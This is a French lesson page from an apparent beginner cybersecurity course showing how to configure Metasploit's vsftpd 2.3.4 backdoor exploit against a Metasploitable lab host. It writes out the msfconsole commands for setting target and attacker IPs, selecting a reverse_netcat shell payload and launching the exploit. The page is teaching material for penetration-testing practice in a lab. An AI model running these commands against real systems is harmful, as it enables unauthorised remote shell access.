Retour au cours

Utilisation de `msfconsole` II : Recherche et utilisation

Maîtrise de la Cybersécurité : de Zéro à Héros

Configuration pratique de Metasploit

Après avoir sélectionné un exploit, vous devez configurer les paramètres, en particulier la cible et l'hôte d'écoute.

Définir les options requises

Chaque exploit nécessite au moins deux variables critiques :

  1. RHOSTS (Remote Hosts) : L'adresse IP de la machine cible.
  2. LHOST (Local Host) : L'adresse IP de l'attaquant (machine Kali Linux) vers laquelle le reverse shell se connectera.

Suite de l'exemple (attaque de Metasploitable, IP 192.168.1.50) :

msfconsole msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Définir l'IP cible

msf6 exploit(...) > set RHOSTS 192.168.1.50

Définir notre IP Kali (IP attaquant)

msf6 exploit(...) > set LHOST 192.168.1.10

Choisir le payload (souvent sélectionné automatiquement)

msf6 exploit(...) > show payloads msf6 exploit(...) > set PAYLOAD cmd/unix/reverse_netcat

Lancer l'exploit

msf6 exploit(...) > exploit